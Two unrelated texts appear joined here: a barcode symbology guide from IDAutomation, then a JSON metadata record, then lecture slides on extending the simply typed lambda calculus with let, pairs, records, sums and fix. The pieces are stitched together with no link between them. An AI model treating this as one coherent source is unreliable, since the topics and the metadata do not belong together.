<tbody> <tr> <td>12345678901</td> <td>ÊBxzÈ1sÍ</td> <td></td> </tr> </tbody> </table> Further Reference: Barcode Fonts Font Encoders Barcode Components Barcode Components are products that integrate into applications and development environments to generate barcodes as images. For example, the Barcode Image Generator and Barcode Label Software are built by using the IDAutomation .NET Forms Control (integrated into the applications). These products are the most complex to use and are generally recommended for Developers that want to integrate barcodes into their applications (custom applications). Components are in the form of DLLs, class files, and other component files. Barcode Components include Web, Application and Native Generator products: - **.NET Forms Control** (used in Visual Studio .NET) - **ActiveX Control** - **Reporting Services CRI** (used in SSRS) - **ASP Server Component for IIS** - **Java Component** - **ASP.NET Server Control** (for Web Development) - **Hosted Service** (IDAutomation provides service to host barcode on Web Server) - **Native Generators** About Native Generators: Developed by IDAutomation.com, Inc., Native Generators are components that generate barcodes without using barcode fonts, DLLs, or plug-ins. It is code that builds the barcode using Unicode and system fonts. Native Generator products have been developed for Crystal Reports, Javascript, Oracle Reports, Access, FileMaker, Google Docs, PHP, ASP, and ASPX. Barcode Symbologies A symbology/barcode type is a protocol for arranging the bars and spaces that make up a particular kind of barcode. IDAutomation offers several symbologies as fonts, applications, and components. There are two major symbology types: - Linear Barcodes (1D) - Two-Dimensional Barcodes (2D). **Linear** Barcodes representing data in the widths (lines) and the spacing of parallel lines such as Code128, Code 39, and UPC, are referred to as Linear or 1D (one-dimensional) barcode symbologies. - Holds less than 85 characters (symbology specific character limit) - A majority of customers are set up to use Linear barcodes (Linear scanner). - Creates a wide barcode. **2D** Two-dimensional (2D) barcodes such as Data Matrix, PDF417, and QR Code, may have patterns of squares, dots, hexagons and other geometric patterns. While maintaining a fairly small size, these barcode types hold much more data than Linear barcodes. 2D barcodes can hold hundreds of characters. - Can hold hundreds of characters - Requires a 2D barcode scanner - With the same data, creates a smaller barcode than Linear Barcode Standards The type of barcode that should be used may depend on several variables, including: - Standards and mandates - Purpose and use - Data encoded - Printing and/or decoding methods There are several types of barcode standards for different purposes. Each type of symbology (or barcode type) is a standard that defines the printed symbol and how a device, such as a barcode scanner, reads and decodes the printed symbol. If an industry standard has already been established for the intended implementation, the standard should be implemented. For example, the distribution industry requires companies to place a UPC barcode on products that they distribute. If a standard does not exist for the chosen implementation, several symbologies are available to choose from. For example, if a warehouse employee wants to keep track of items in a warehouse using barcodes, he/she may not be required to select a particular barcode type or barcode standard. Industry standards are usually established when multiple parties or companies are involved in the ID process. The standard is not necessarily the same as the barcode symbology. Barcode standards define how to use the barcode symbology in a particular situation. For example, the two standards to create ISBN barcodes for books and generate ISSN barcodes for periodicals both use EAN-13 to encode data into the barcode, but have different methods depending on the specific ISBN & ISSN standards. Linear Barcodes Until recently, with the increased popularity of the 2D barcode QR Code, many people were only aware of Linear barcodes—identified by its vertical lines. Linear barcodes are very common and are used for several purposes in many industries. In this section, we will define and explain several of the most popular Linear barcode types including: - Code 39 (Code 3 of 9) - Code 128 - Interleaved 2 of 5 (I2 of 5) - UPCa and UPCe - EAN8 and EAN13 - Databar - Postnet - Intelligent Mail **Code 39** Code 39 (also known as the 3 of 9 Barcode, Code 3 of 9 and Barcode39) is a common barcode type used for various labels, such as name badges, inventory and industrial applications. The symbology of the Code 39 character set consists of barcode symbols representing numbers 0-9, upper-case letters A-Z, the space character and the following symbols: - . $ / + %. There is an Extended Code 39 that encodes lower case characters. The Code 39 barcode is the easiest of the alpha-numeric barcodes to use and is designed for character self-checking, thus eliminating the need for check character calculations. A check character is a character that is added to the end of a block of transmitted data and used to check the accuracy of the transmission. Further Reference: [Code 39 FAQ](#) Code 128 The Code 128 barcode is a high-density Linear symbology that encodes text, numbers, numerous functions and the entire 128 ASCII character set (from ASCII 0 to ASCII 128.) It is commonly used for several implementations; and is also referred to as ISBT-128, GS1-128, UCC-128, EAN-128 and USS Code 128 (barcodes standards for Code 128). It has three major character sets: Code 128 A, Code 128 B, and Code 128 C. A fourth set, Code 128 Auto, is the most efficient and uses a combination of A, B, and C. - Set A encodes numbers 0-9, uppercase A-Z, and control characters, and special characters. - Set B encodes numbers 0-9, uppercase A-Z, lowercase a-z, and special characters. - Set C encodes numeric data. Further Reference: Code 128 FAQ Interleaved 2 of 5 Interleaved 2 of 5 (ITF) is a numeric barcode used for encoding number pairs in a high-density barcode format. Interleaved 2 of 5 is designed for character self-checking, which eliminates the requirement for checksum characters; although checksum characters are required by some ITF specifications because they do maximize data integrity. ITF barcodes always contain an even number of digits, because a single ITF barcode character represents two numbers to achieve a higher density than other barcode types. The ITF barcode character set consists of barcode symbols representing double-digit characters 00 to 99 in addition to start and stop characters. The complete printed ITF barcode contains a leading quiet zone, a start pattern, Interleaved 2 of 5 barcode representing encoded data, a stop pattern and a trailing quiet zone which should be 10 times the width of the short bar, according to ANSI specifications. Further Reference: Common Question regarding Interleaved 2 of 5 I 2of 5 FAQ UPC, UPCE, EAN8, EAN13 UPC and EAN barcodes have been in use since the 1970s to encode Global Trade Item Numbers (GTIN), which uniquely identify a product for retail checkout or tracking purposes. UPC, UCC, EAN, JAN, GTIN-8, GTIN-12 and GTIN-13, ISBN and Bookland barcodes are all created from the same symbology type, commonly known as the UPC/EAN barcode. UPC and EAN barcodes appear on distributable items such as canned goods, magazines, books, and other products. A more advanced barcode type, Databar, has replaced UPC/EAN. Further Reference: [UPC/EAN FAQ](#) Databar The GS1 DataBar barcode symbology is the latest barcode type for space-constrained identification from GS1, formerly EAN International and the Uniform Code Council, Inc. DataBar barcodes have been utilized to solve many problems in POS, grocery and healthcare, where items are too small to allow for traditional barcode types, or where additional information needs to be encoded, such as product weight, expiration dates, country of origin or serial numbers. DataBar is also the only barcode symbology approved by GS1 to encode GTIN-14 numbers in all retail checkout systems. Further Reference: [Databar FAQ](#) Postnet The POSTNET (Postal Numeric Encoding Technique) barcode type was developed by the U. S. Post Office to encode zip code information. POSTNET barcodes on U.S. mail improve the speed, accuracy and delivery of mail. Some U.S. Post Offices also offer a discount for sending bulk mail that contains the POSTNET barcode. Further Reference: [USPS Postal FAQ](#) **Intelligent Mail** USPS Intelligent Mail (Aka: OneCode, the 4-State Customer Barcode, 4CB and USPS4CB) includes a height-modulated barcode designed for use in high speed, automated, mail sorting machines that allow both PLANET and POSTNET barcode information to be combined into a single barcode to track mailings, request address-quality services (including updated address-change information) and return-mail service. Further Reference: [Intelligent Mail FAQ](#) **Linear Barcode Facts** - Linear Barcodes use start and stop characters to determine the beginning and end of barcodes. - Linear Barcode cannot hold/encode an enormous amount of data. - Linear Barcode Scanners are less expensive than 2D Barcode Scanners. - Linear Barcodes may require a check character calculation. - Code 128 and Code 39 are very popular Linear barcodes types. - Code 128, Code 39, and Code 93 can encode alphanumeric data. - Code 39, Interleaved 2 of 5, and Postnet do not require check digits. - Planet is a Postal barcode type that is the reverse bar height of Postnet. - UPCe encodes eleven digits and produces an eight character barcode. - UPCA encodes eleven digits and produces a twelve character barcode. - SSCC18, SCC14, Intelligent Mail Container are standards of Code 128. - Interleaved 2 of 5 and Code 128 C encode numeric data in pairs. - Databar has several subsets including: Limited, Expanded, and Omni-Directional. Two Dimensional Barcodes (2D) Two-Dimensional Barcodes have been around a long time. However, the general public has recently become aware of them due to the rise of smart phones and mobile devices that scan the popular, QR Code. 2D barcodes are identified by their square or rectangle shape. Some of the most well-known 2D barcodes include: - Data Matrix - QR Code - Aztec - PDF417 - Maxicode Data Matrix Data Matrix is a very efficient, two-dimensional (2D) barcode symbology that uses a small area of square modules with a unique perimeter pattern, which helps the barcode scanner determine cell locations and decode the symbol. Characters, numbers, text and actual bytes of data may be encoded, including Unicode characters and photos. The encoding and decoding process of Data Matrix is very complex. Several methods have been used for error correction in the past. All current implementations have been standardized on the ECC200 error correction method, which is approved by ANSI/AIM BC11 and the ISO/IEC 16022 specification. IDAutomation 2D Data Matrix barcode products all support ECC200 by default and are based on the ANSI/AIM BC11 and the ISO/IEC 16022 specifications. The Reed-Solomon error correction algorithms of ECC200 allow the recognition of barcodes that are up to 60% damaged. Error Correction allows the barcode to sustain damage and can without error. Further Reference: Data Matrix FAQ **QR Code** QR Code is a very efficient, two-dimensional (2D) barcode symbology that uses a small area of square modules with a unique perimeter pattern, which helps the barcode scanner determine cell locations and decode the QR Code symbol. Characters, numbers, text and actual bytes of data may be encoded, including Unicode characters and images. IDAutomation's implementation of QR Code is based on the ISO/IEC 18004:2006 standard. QR Codes are commonly used with smart-phone devices, such as the iPhone, Blackberry, Android and Windows 7 Phones to direct users to additional information about a particular topic. Further Reference: [QR-Code FAQ](#) **Aztec** Aztec barcodes are very efficient two-dimensional (2D) symbologies that use square modules with a unique finder pattern in the middle of the symbol, which helps the barcode scanner to determine cell locations to decode the symbol. Characters, numbers, text and bytes of data may be encoded in an Aztec barcode. The IDAutomation implementation of the Aztec barcode symbol is based on the ISO standard version released into the public domain by its inventor, Honeywell. Further Reference: [Aztec FAQ](#) **PDF417** The PDF417 barcode is a two-dimensional (2D), high-density symbology capable of encoding text, numbers, files and actual data bytes. Large amounts of text and data can be stored securely and inexpensively when using the PDF417 barcode symbology. The printed symbol consists of several Linear rows of stacked codewords. Each codeword represents 1 of 929 possible values from one of three different clusters. A different cluster is chosen for each row, repeating after every three rows. Because the codewords in each cluster are unique, the scanner is able to determine what line each cluster is from. PDF417 uses Reed Solomon error correction instead of check digits. This error correction allows the symbol to endure some damage without causing loss of data. Further Reference: PDF417 FAQ Maxicode Maxicode is an international 2D (two-dimensional) barcode that is currently used by UPS on shipping labels for world-wide addressing and package sortation. Maxicode symbols are fixed in size and are made up of offset rows of hexagonal modules arranged around a unique finder pattern. Maxicode includes error correction, which enables the symbol to be decoded when it is slightly damaged. Maxicode symbols encode two messages; a primary message and a secondary message. The primary message usually encodes the postal code, country code and the class of service number. The secondary message usually encodes address data, but can encode other types of information as well. Further Reference: Maxicode FAQ Facts About 2D Barcodes - The Department of Defense uses Data Matrix Barcodes. - UPS uses Maxicode barcodes. - 2D Barcodes can encode hundreds of characters. - 2D Barcodes require a 2D scanner to scan them. - With the same data, 2D Barcodes, compared to Linear barcodes, are smaller. - Instead of check digits, 2D barcodes use Error Correction. - MicroPDF417 and MacroPDF417 are symbologies derived from PDF417. - Acuity CiMatrix / Siemens invented the Data Matrix ECC200 symbology and placed it in the public domain.
{"Source-Url": "http://www.idautomation.com/barcode-faq/barcode-educational-guide.pdf", "len_cl100k_base": 4832, "olmocr-version": "0.1.50", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 38381, "total-output-tokens": 5692, "length": "2e12", "weborganizer": {"__label__adult": 0.000705718994140625, "__label__art_design": 0.0021514892578125, "__label__crime_law": 0.0007939338684082031, "__label__education_jobs": 0.0011358261108398438, "__label__entertainment": 0.00018513202667236328, "__label__fashion_beauty": 0.00043582916259765625, "__label__finance_business": 0.005191802978515625, "__label__food_dining": 0.0005116462707519531, "__label__games": 0.0011854171752929688, "__label__hardware": 0.1365966796875, "__label__health": 0.0002734661102294922, "__label__history": 0.0003066062927246094, "__label__home_hobbies": 0.00046181678771972656, "__label__industrial": 0.00649261474609375, "__label__literature": 0.0002467632293701172, "__label__politics": 0.00018656253814697263, "__label__religion": 0.00066375732421875, "__label__science_tech": 0.0440673828125, "__label__social_life": 6.848573684692383e-05, "__label__software": 0.305419921875, "__label__software_dev": 0.49169921875, "__label__sports_fitness": 0.0002213716506958008, "__label__transportation": 0.0009050369262695312, "__label__travel": 0.0001854896545410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21888, 0.02582]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21888, 0.67626]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21888, 0.86522]], "google_gemma-3-12b-it_contains_pii": [[0, 264, false], [264, 264, null], [264, 1634, null], [1634, 3197, null], [3197, 4424, null], [4424, 5048, null], [5048, 6814, null], [6814, 7300, null], [7300, 8642, null], [8642, 9758, null], [9758, 11221, null], [11221, 12518, null], [12518, 14285, null], [14285, 15839, null], [15839, 17261, null], [17261, 18678, null], [18678, 20109, null], [20109, 21888, null]], "google_gemma-3-12b-it_is_public_document": [[0, 264, true], [264, 264, null], [264, 1634, null], [1634, 3197, null], [3197, 4424, null], [4424, 5048, null], [5048, 6814, null], [6814, 7300, null], [7300, 8642, null], [8642, 9758, null], [9758, 11221, null], [11221, 12518, null], [12518, 14285, null], [14285, 15839, null], [15839, 17261, null], [17261, 18678, null], [18678, 20109, null], [20109, 21888, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21888, null]], "pdf_page_numbers": [[0, 264, 1], [264, 264, 2], [264, 1634, 3], [1634, 3197, 4], [3197, 4424, 5], [4424, 5048, 6], [5048, 6814, 7], [6814, 7300, 8], [7300, 8642, 9], [8642, 9758, 10], [9758, 11221, 11], [11221, 12518, 12], [12518, 14285, 13], [14285, 15839, 14], [15839, 17261, 15], [17261, 18678, 16], [18678, 20109, 17], [20109, 21888, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21888, 0.01493]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
6170b0fc60bba5c34cc396b20ea0587b2c02a20c
Review \[ \begin{align*} e &::= \lambda x.\ e \mid x \mid e\ e \mid c \\ v &::= \lambda x.\ e \mid c \\ \tau &::= \text{int} \mid \tau \rightarrow \tau \\ \Gamma &::= \cdot \mid \Gamma, x : \tau \end{align*} \] - \((\lambda x.\ e)\ v \rightarrow e[v/x]\) - \(e_1 \rightarrow e'_1\) - \(e_2 \rightarrow e'_2\) - \(v\ e_2 \rightarrow v\ e'_2\) \(e[e'/x]\): capture-avoiding substitution of \(e'\) for free \(x\) in \(e\) \[ \begin{align*} \Gamma \vdash c : \text{int} \\ \Gamma \vdash x : \Gamma(x) \\ \Gamma \vdash \lambda x.\ e : \tau_1 \rightarrow \tau_2 \\ \Gamma \vdash e_1 : \tau_2 \rightarrow \tau_1 \\ \Gamma \vdash e_2 : \tau_2 \\ \Gamma \vdash e_1\ e_2 : \tau_1 \end{align*} \] Preservation: If \(\cdot \vdash e : \tau\) and \(e \rightarrow e'\), then \(\cdot \vdash e' : \tau\). Progress: If \(\cdot \vdash e : \tau\), then \(e\) is a value or \(\exists e'\) such that \(e \rightarrow e'\). Adding Stuff Time to use STLC as a foundation for understanding other common language constructs We will add things via a *principled methodology* thanks to a *proper education* - Extend the syntax - Extend the operational semantics - Derived forms (syntactic sugar), or - Direct semantics - Extend the type system - Extend soundness proof (new stuck states, proof cases) In fact, extensions that add new types have even more structure Let bindings (CBV) \[ \begin{align*} e & ::= \ldots \mid \text{let } x = e_1 \text{ in } e_2 \\ e_1 & \rightarrow e_1' \\ \text{let } x = e_1 \text{ in } e_2 & \rightarrow \text{let } x = e_1' \text{ in } e_2 \\ \text{let } x = v \text{ in } e & \rightarrow e[v/x] \end{align*} \] \[ \begin{align*} \Gamma & \vdash e_1 : \tau' \\ \Gamma, x : \tau' & \vdash e_2 : \tau \\ \Gamma & \vdash \text{let } x = e_1 \text{ in } e_2 : \tau \end{align*} \] (Also need to extend definition of substitution...) Progress: If \( e \) is a let, 1 of the 2 new rules apply (using induction) Preservation: Uses Substitution Lemma Substitution Lemma: Uses Weakening and Exchange Derived forms `let` seems just like `λ`, so can make it a derived form - `let x = e_1 in e_2` “a macro” / “desugars to” `(λx. e_2) e_1` - A “derived form” (Harder if `λ` needs explicit type) Or just define the semantics to replace `let` with `λ`: \[ \text{let } x = e_1 \text{ in } e_2 \rightarrow (\lambda x. e_2) e_1 \] These 3 semantics are *different* in the state-sequence sense \[ (e_1 \rightarrow e_2 \rightarrow \ldots \rightarrow e_n) \] - But (totally) *equivalent* and you could prove it (not hard) Note: ML type-checks `let` and `λ` differently (later topic) Note: Don’t desugar early if it hurts error messages! Booleans and Conditionals \[ e ::= \ldots | \text{true} | \text{false} | \text{if } e_1 \ e_2 \ e_3 \] \[ v ::= \ldots | \text{true} | \text{false} \] \[ \tau ::= \ldots | \text{bool} \] \[ \frac{e_1 \to e_1'}{\text{if } e_1 \ e_2 \ e_3 \to \text{if } e_1' \ e_2 \ e_3} \] \[ \text{if true } e_2 \ e_3 \to e_2 \quad \text{if false } e_2 \ e_3 \to e_3 \] \[ \frac{\Gamma \vdash e_1 : \text{bool}}{\Gamma \vdash \text{if } e_1 \ e_2 \ e_3 : \tau} \] \[ \frac{\Gamma \vdash e_2 : \tau \quad \Gamma \vdash e_3 : \tau}{\Gamma \vdash \text{if } e_1 \ e_2 \ e_3 : \tau} \] \[ \frac{\Gamma \vdash \text{true} : \text{bool}}{\Gamma \vdash \text{false} : \text{bool}} \] Also extend definition of substitution (will stop writing that)... Notes: CBN, new Canonical Forms case, all lemma cases easy Pairs (CBV, left-right) \[ \begin{align*} e & ::= \ldots \mid (e, e) \mid e.1 \mid e.2 \\ v & ::= \ldots \mid (v, v) \\ \tau & ::= \ldots \mid \tau * \tau \end{align*} \] \[ \begin{align*} e_1 & \rightarrow e'_1 \\ \hline (e_1, e_2) & \rightarrow (e'_1, e_2) \\ \hline e & \rightarrow e' \\ \hline e.1 & \rightarrow e'.1 \\ \hline e & \rightarrow e' \\ \hline e.2 & \rightarrow e'.2 \\ \hline (v_1, v_2).1 & \rightarrow v_1 \\ \hline (v_1, v_2).2 & \rightarrow v_2 \end{align*} \] Small-step can be a pain - Large-step needs only 3 rules - Will learn more concise notation later (evaluation contexts) Pairs continued \[ \Gamma \vdash e_1 : \tau_1 \quad \Gamma \vdash e_2 : \tau_2 \] \[ \Gamma \vdash (e_1, e_2) : \tau_1 \ast \tau_2 \] \[ \Gamma \vdash e : \tau_1 \ast \tau_2 \] \[ \Gamma \vdash e.1 : \tau_1 \] \[ \Gamma \vdash e.2 : \tau_2 \] Canonical Forms: If \( \cdot \vdash v : \tau_1 \ast \tau_2 \), then \( v \) has the form \((v_1, v_2)\) Progress: New cases using Canonical Forms are \( v.1 \) and \( v.2 \) Preservation: For primitive reductions, inversion gives the result directly Records Records are like $n$-ary tuples except with *named fields* - Field names are *not* variables; they do *not* $\alpha$-convert \[ \begin{align*} e & ::= \ldots \mid \{ l_1 = e_1; \ldots; l_n = e_n \} \mid e.l \\ v & ::= \ldots \mid \{ l_1 = v_1; \ldots; l_n = v_n \} \\ \tau & ::= \ldots \mid \{ l_1 : \tau_1; \ldots; l_n : \tau_n \} \end{align*} \] \[ \begin{array}{c} \frac{e_i \to e'_i}{\{ l_1 = v_1, \ldots, l_{i-1} = v_{i-1}, l_i = e_i, \ldots, l_n = e_n \} \to \{ l_1 = v_1, \ldots, l_{i-1} = v_{i-1}, l_i = e'_i, \ldots, l_n = e_n \}} \\ \frac{e \to e'}{e.l \to e'.l} \end{array} \] \[ \begin{align*} 1 \leq i \leq n \\ \{ l_1 = v_1, \ldots, l_n = v_n \}.l_i \to v_i \end{align*} \] \[ \frac{\Gamma \vdash e_1 : \tau_1 \quad \ldots \quad \Gamma \vdash e_n : \tau_n \quad \text{labels distinct}}{\Gamma \vdash \{ l_1 = e_1, \ldots, l_n = e_n \} : \{ l_1 : \tau_1, \ldots, l_n : \tau_n \}} \] \[ \frac{\Gamma \vdash e : \{ l_1 : \tau_1, \ldots, l_n : \tau_n \} \quad 1 \leq i \leq n}{\Gamma \vdash e.l_i : \tau_i} \] Records continued Should we be allowed to reorder fields? - \[ \vdash \{ l_1 = 42; l_2 = \text{true} \} : \{ l_2 : \text{bool}; l_1 : \text{int} \} \] Really a question about, “when are two types equal?” Nothing wrong with this from a type-safety perspective, yet many languages disallow it - Reasons: Implementation efficiency, type inference Return to this topic when we study subtyping Sums What about ML-style datatypes: \[ \text{type } t = A \mid B \text{ of } \text{int} \mid C \text{ of } \text{int} * t \] 1. Tagged variants (i.e., discriminated unions) 2. Recursive types 3. Type constructors (e.g., \text{type } 'a \text{ mylist} = ...) 4. Named types For now, just model (1) with (anonymous) sum types - (2) is in a later lecture, (3) is straightforward, and (4) we’ll discuss informally Sums syntax and overview \[ e ::= \ldots | A(e) | B(e) | \text{match } e \text{ with } A x. \ e | B x. \ e \] \[ v ::= \ldots | A(v) | B(v) \] \[ \tau ::= \ldots | \tau_1 + \tau_2 \] - Only two constructors: \(A\) and \(B\) - All values of any sum type built from these constructors - So \(A(e)\) can have any sum type allowed by \(e\)’s type - No need to declare sum types in advance - Like functions, will “guess the type” in our rules Sums operational semantics match $A(v)$ with $Ax. \ e_1 \mid By. \ e_2 \rightarrow e_1[v/x]$ match $B(v)$ with $Ax. \ e_1 \mid By. \ e_2 \rightarrow e_2[v/y]$ \[ \begin{align*} e \rightarrow e' & \quad \Rightarrow \quad A(e) \rightarrow A(e') \\ B(e) \rightarrow B(e') & \quad \Rightarrow \quad e \rightarrow e' \end{align*} \] match $e$ with $Ax. \ e_1 \mid By. \ e_2 \rightarrow$ match $e'$ with $Ax. \ e_1 \mid By. \ e_2$ match has binding occurrences, just like pattern-matching (Definition of substitution must avoid capture, just like functions) What is going on Feel free to think about *tagged values* in your head: - A tagged value is a pair of: - A tag A or B (or 0 or 1 if you prefer) - The (underlying) value - A match: - Checks the tag - Binds the variable to the (underlying) value This much is just like OCaml and related to homework 2 Sums Typing Rules Inference version (not trivial to infer; can require annotations) \[ \begin{align*} \Gamma & \vdash e : \tau_1 \\ \Gamma & \vdash A(e) : \tau_1 + \tau_2 \\ \Gamma & \vdash e : \tau_1 + \tau_2 \\ \Gamma & \vdash A(e) : \tau_1 + \tau_2 \\ \Gamma & \vdash B(e) : \tau_1 + \tau_2 \end{align*} \] Key ideas: - For constructor-uses, “other side can be anything” - For `match`, both sides need same type - Don’t know which branch will be taken, just like an `if`. - In fact, can drop explicit booleans and encode with sums: E.g., `bool = int + int`, `true = A(0)`, `false = B(0)` Sums Type Safety Canonical Forms: If $\cdot \vdash v : \tau_1 + \tau_2$, then there exists a $v_1$ such that either $v$ is $A(v_1)$ and $\cdot \vdash v_1 : \tau_1$ or $v$ is $B(v_1)$ and $\cdot \vdash v_1 : \tau_2$ - Progress for $\text{match } v \text{ with } Ax. \ e_1 \mid By. \ e_2$ follows, as usual, from Canonical Forms - Preservation for $\text{match } v \text{ with } Ax. \ e_1 \mid By. \ e_2$ follows from the type of the underlying value and the Substitution Lemma - The Substitution Lemma has new “hard” cases because we have new binding occurrences - But that’s all there is to it (plus lots of induction) What are sums for? - Pairs, structs, records, aggregates are fundamental data-builders - Sums are just as fundamental: “this or that not both” - You have seen how OCaml does sums (datatypes) - Worth showing how C and Java do the same thing - A primitive in one language is an idiom in another type t = A of t1 | B of t2 | C of t3 match e with A x -> ... One way in C: ```c struct t { enum {A, B, C} tag; union {t1 a; t2 b; t3 c;} data; }; ... switch(e->tag){ case A: t1 x=e->data.a; ... ``` - No static checking that tag is obeyed - As fat as the fattest variant (avoidable with casts) - Mutation costs us again! Sums in Java type t = A of t1 | B of t2 | C of t3 match e with A x -> ... One way in Java (t4 is the match-expression’s type): abstract class t {abstract t4 m();} class A extends t { t1 x; t4 m(){...}} class B extends t { t2 x; t4 m(){...}} class C extends t { t3 x; t4 m(){...}} ... e.m() ... - A new method in t and subclasses for each match expression - Supports extensibility via new variants (subclasses) instead of extensibility via new operations (match expressions) Pairs vs. Sums You need both in your language - With only pairs, you clumsily use dummy values, waste space, and rely on unchecked tagging conventions - Example: replace `int + (int → int)` with `int * (int * (int → int))` Pairs and sums are “logical duals” (more on that later) - To make a $\tau_1 \ast \tau_2$ you need a $\tau_1$ and a $\tau_2$ - To make a $\tau_1 + \tau_2$ you need a $\tau_1$ or a $\tau_2$ - Given a $\tau_1 \ast \tau_2$, you can get a $\tau_1$ or a $\tau_2$ (or both; your “choice”) - Given a $\tau_1 + \tau_2$, you must be prepared for either a $\tau_1$ or $\tau_2$ (the value’s “choice”) Base Types and Primitives, in general What about floats, strings, ...? Could add them all or do something more general... Parameterize our language/semantics by a collection of base types $(b_1, \ldots, b_n)$ and primitives $(p_1 : \tau_1, \ldots, p_n : \tau_n)$. Examples: - `concat : string → string → string` - `toInt : float → int` - “hello” : string For each primitive, assume if applied to values of the right types it produces a value of the right type. Together the types and assumed steps tell us how to type-check and evaluate $p_i \ v_1 \ldots \ v_n$ where $p_i$ is a primitive. We can prove soundness once and for all given the assumptions. Recursion We won’t prove it, but every extension so far preserves termination. A Turing-complete language needs some sort of loop, but our lambda-calculus encoding won’t type-check, nor will any encoding of equal expressive power. So instead add an explicit construct for recursion. You might be thinking \texttt{let rec } \texttt{f x = e}, but we will do something more concise and general but less intuitive. \[ e ::= \ldots \mid \text{fix } e \] \[ e \rightarrow e' \\ \text{fix } e \rightarrow \text{fix } e' \\ \text{fix } \lambda x. e \rightarrow e[\text{fix } \lambda x. e/x] \] No new values and no new types. Using fix To use fix like let rec, just pass it a two-argument function where the first argument is for recursion - Not shown: fix and tuples can also encode mutual recursion Example: \[(\text{fix } \lambda f. \lambda n. \text{if } (n<1) 1 (n * (f(n - 1)))) 5\] \[\rightarrow\] \[(\lambda n. \text{if } (n<1) 1 (n * ((\text{fix } \lambda f. \lambda n. \text{if } (n<1) 1 (n * (f(n - 1))))(n - 1)))) 5\] \[\rightarrow\] \[\text{if } (5<1) 1 (5 * ((\text{fix } \lambda f. \lambda n. \text{if } (n<1) 1 (n * (f(n - 1))))(5 - 1))\] \[\rightarrow^2\] \[5 * ((\text{fix } \lambda f. \lambda n. \text{if } (n<1) 1 (n * (f(n - 1))))(5 - 1))\] \[\rightarrow^2\] \[5 * ((\lambda n. \text{if } (n<1) 1 (n * ((\text{fix } \lambda f. \lambda n. \text{if } (n<1) 1 (n * (f(n - 1))))(n - 1)))) 4)\] \[\rightarrow\] \[\ldots\] Why called fix? In math, a fix-point of a function \( g \) is an \( x \) such that \( g(x) = x \) - This makes sense only if \( g \) has type \( \tau \rightarrow \tau \) for some \( \tau \) - A particular \( g \) could have have 0, 1, 39, or infinity fix-points - Examples for functions of type \( \text{int} \rightarrow \text{int} \): - \( \lambda x. \ x + 1 \) has no fix-points - \( \lambda x. \ x * 0 \) has one fix-point - \( \lambda x. \ \text{absolute\_value}(x) \) has an infinite number of fix-points - \( \lambda x. \ \text{if} \ (x < 10 \ \&\& \ x > 0) \ x \ 0 \) has 10 fix-points Higher types At higher types like \((\text{int} \rightarrow \text{int}) \rightarrow (\text{int} \rightarrow \text{int})\), the notion of fix-point is exactly the same (but harder to think about) - For what inputs \(f\) of type \(\text{int} \rightarrow \text{int}\) is \(g(f) = f\) Examples: - \(\lambda f. \lambda x. (f \ x) + 1\) has no fix-points - \(\lambda f. \lambda x. (f \ x) \ast 0\) (or just \(\lambda f. \lambda x. 0\)) has 1 fix-point - The function that always returns 0 - In math, there is exactly one such function (cf. equivalence) - \(\lambda f. \lambda x. \text{absolute}_\text{value}(f \ x)\) has an infinite number of fix-points: Any function that never returns a negative result Back to factorial Now, what are the fix-points of \[ \lambda f. \lambda x. \text{if } (x < 1) 1 (x \times (f(x - 1))) \]? It turns out there is exactly one (in math): the factorial function! And \textbf{fix} \( \lambda f. \lambda x. \text{if } (x < 1) 1 (x \times (f(x - 1))) \) behaves just like the factorial function - That is, it behaves just like the fix-point of \[ \lambda f. \lambda x. \text{if } (x < 1) 1 (x \times (f(x - 1))) \] - In general, \textbf{fix} takes a function-taking-function and returns its fix-point (This isn't necessarily important, but it explains the terminology and shows that programming is deeply connected to mathematics) Typing \texttt{fix} \[ \Gamma \vdash e : \tau \rightarrow \tau \\ \frac{\Gamma \vdash e : \tau \rightarrow \tau}{\Gamma \vdash \text{fix } e : \tau} \] Math explanation: If \( e \) is a function from \( \tau \) to \( \tau \), then \( \text{fix } e \), the fixed-point of \( e \), is some \( \tau \) with the fixed-point property - So it’s something with type \( \tau \) Operational explanation: \( \text{fix } \lambda x. e' \) becomes \( e'[\text{fix } \lambda x. e'/x] \) - The substitution means \( x \) and \( \text{fix } \lambda x. e' \) need the same type - The result means \( e' \) and \( \text{fix } \lambda x. e' \) need the same type Note: The \( \tau \) in the typing rule is usually insantiated with a function type - e.g., \( \tau_1 \rightarrow \tau_2 \), so \( e \) has type \( (\tau_1 \rightarrow \tau_2) \rightarrow (\tau_1 \rightarrow \tau_2) \) Note: Proving soundness is straightforward! General approach We added let, booleans, pairs, records, sums, and fix - **let** was syntactic sugar - **fix** made us Turing-complete by “baking in” self-application - The others *added types* Whenever we add a new form of type $\tau$ there are: - Introduction forms (ways to make values of type $\tau$) - Elimination forms (ways to use values of type $\tau$) What are these forms for functions? Pairs? Sums? When you add a new type, think “what are the intro and elim forms”? Anonymity We added many forms of types, all *unnamed* a.k.a. *structural*. Many real PLs have (all or mostly) *named* types: - Java, C, C++: all record types (or similar) have names - Omitting them just means compiler makes up a name - OCaml sum types and record types have names A never-ending debate: - Structural types allow more code reuse: good - Named types allow less code reuse: good - Structural types allow generic type-based 